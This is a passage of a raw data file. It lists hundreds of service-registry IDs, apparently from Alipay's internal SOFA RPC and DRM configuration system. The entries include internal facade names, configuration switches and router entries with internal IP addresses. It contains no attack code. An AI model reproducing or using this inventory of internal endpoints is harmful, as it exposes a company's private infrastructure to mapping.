NCE_ID#@#SOFA","DATA_ID_30.73.152.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gftms.facade.api.basic.countpartytag.CounterPartyTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTConfigQueryFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.datacloudSingleDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.rating:name=com.alipay.rating.service.facade.localclient.drm.RatingLocalclientDrmImpl.ruleConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.elf.facade.console.conf.LabelConfManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insserviceprod.facade.InsSerProgressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:merchantIdentityQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.client.service.InsMktProdExterfaceInvokeService:1.0:insscenemarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorLeaveManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:agdsroalipay_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mwealthprod.common.service.facade.YouthAckCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.channel.ChannelRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.risk.callback.RiskDefenseCheckCallback:1.0:dmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.ExpandFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.FundPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.SettleDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.openAuthQueryMaxPageNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cicprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:loginxiaowei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.CollectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.MigrateTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.PkgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.biz.service.impl.common.antq.IotThingShadowHandler:1.0:iotDeviceInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itestmng.common.service.facade.api.TestHubService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cssocial.common.service.facade.YqGeneralSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isecuritycore.service.gateway.facade.SecurityServiceGateway:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.conf.facade.XViewMetadataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.SecurityPolicyVerifyFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.69.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.facade.api.acctrans.AcctsPdEvCodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartPayBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.tradeexprodTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:consumeweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillImportedBillInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.FlowCleanningFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.terminal.query.MerchantTerminalQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaclouddevice.facade.device.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppSafeDomainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jss.job.service.facade.JobServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paydecision:name=com.alipay.paydecision.service.client.trigger.PaydecisionTimelinessResource.twoHourAddMinuteStr,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mvcdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleRelationQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.28.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.circle.api.CircleSetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fincorecheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.ModuleSchemaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.script.api.CommonScriptOptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.ClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.markets.MarketTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.MerchantRiskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.openapi.abtest.DarwinABTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.delivery.Campaign4PromoApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.account.facade.api.FAWithdrawFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.26.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scheduler.common.service.facade.update.OpsManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.lifemng.biz.channelmanager.alarm.drm.AlarmCtrlDRM.numOfAlarm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbprizeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.search.ContentSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmeteragecore.common.service.manager.MeterDomainConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rockfuzz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROMOHELIX#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.CommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeDateCaculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.MngPageRedirectStrategyDrm.redirectBlackRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:inslifeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:acom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HelloService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:accenterAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.common.ZappInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctuofflineplt.common.sofa.consistent.facade.service.FeatureOfflineCalcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.CaeAccOrderDutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.beatSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.87.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.promotion.common.service.facade.api.activitymanage.BudgetManageNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.219.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcpromochannel.service.PcPromoChannelMessageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.plan.PlanAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.budget.BudgetServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.CpFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbsc.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmscore.common.service.facade.LimitSceneModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.solution.wallet.CustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.needSetEid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:forexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.PayClearingMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finpwm.FinpwmSavingPlanManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.ArActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.core.service.api.HedgeBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientExceptionDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.TransferOutQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:clientsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenAppManageTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secutrade.common.service.facade.api.broker.BrokerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.bluearmyprod.core.service.drm.PublishRiskCaseDRMConfig.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.miniclientop.MiniClientOpConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenterprod.integration.aliyun.LyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.LifmngSignTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.logKeyType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CLOUDPROVISION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@antbuservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.discountcore.common.service.facade.DiscountApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zpublishuiweb.zpublishuiweb_local_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.personalproxy.service.kmi.KmiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.qrcode.AssetQrCodePreActiveFacade:1.0:mrchasset_assetQrCodePreActive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbconfigcenter.common.service.facade.api.meta.MetaTableManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.209.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.omp.RankAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.event.ProductXStatusChangeHandlerForTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.tairWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.serverlesscore.endpoint.dds.rpc.service.SofaGwRpcService1:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.member.MemberService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.tinyappdata.api.TinyAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloancommon.common.service.facade.dcsengine.api.DcsCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.data.MiniAppAssistMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductFacade:1.0:STATIC_PRODUCT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.evaluate.EvaluationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_tp_s_cardinfo#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcommerceprod.common.service.facade.QrCodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mif-DCLeadsDataSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.common.service.facade.paymentbehavior.api.PaymentBehaviorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.195.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.usertemplate.UserTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.DailyCutCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.micloan.agdslibra.integration.label.CustomerLabelQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.PunishDataLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.131.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.listFormat1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.17.164.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financemng.common.facade.service.YebIncomeInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.meta.BdmPhyColumnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.config.ConfigSimpleService:1.0:journeyMapConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.ci.CodeAttackCiInspectionsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antchaos.client.api.AwatchChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.openPipelineSnapshot,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.selfhelp.AppMultiReturnUrlManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudbox.facade.api.ServerApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@aciamcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.30.196.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.document.CategoryManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimEvidenceVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zconsole.msgdelayed.QueryMsgDelayedService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.card.CardTemplateManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.bff.WealthFrontFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.process.BatchProcessTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.signcenter.service.read.SignDataQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.SecureQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotvilla.common.service.facade.api.manager.KLineManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.account.facade.AdvisorUserAccompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.minicloudparse.MinicloudparseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.transcode.TransCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwsap.common.service.facade.httpsqlproxy.DsHttpSqlProxyConfDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.autoinsprod.common.referral.AutoInsReferralQrCodeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.RelationGraphDiscoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APSHOPCENTERMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.RiskSampleCategoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.execute.RetryOrderDRMResource.batchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antopoAntProcessCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.notify.management.service.MsgDeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditOrgAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.TRaasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.ConfigSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:asttshipcoreElasticFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DecisionService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapitool.facade.notify.NotifyQueryFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.MediaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.UnifiedDetectConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingResultQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdsr.common.service.facade.syncrecognize.SyncRecognizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.finaccenter_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.132.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.239.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.lockCheckFlowString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_172.21.80.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:vhostapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.UniDataQueryForGalaxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.routeclient.Def